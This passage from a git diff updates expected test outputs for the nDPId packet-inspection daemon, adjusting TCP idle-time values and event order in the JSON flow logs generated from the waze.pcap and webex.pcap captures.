port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","packets-captured":597,"packets-processed":597,"total-skipped-flows":0,"total-l4-data-len":326183,"total-not-detected-flows":1,"total-guessed-flows":9,"total-detected-flows":23,"total-detection-updates":29,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":229,"global_ts_msec":1435587907392} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 597/597 diff --git a/test/results/webex.pcap.out b/test/results/webex.pcap.out index 4d7e9bf86..1760dc31e 100644 --- a/test/results/webex.pcap.out +++ b/test/results/webex.pcap.out @@ -1,385 +1,385 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"webex.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1444570624853} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570624853,"flow_last_seen":1444570624853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570624853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628117,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628117,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 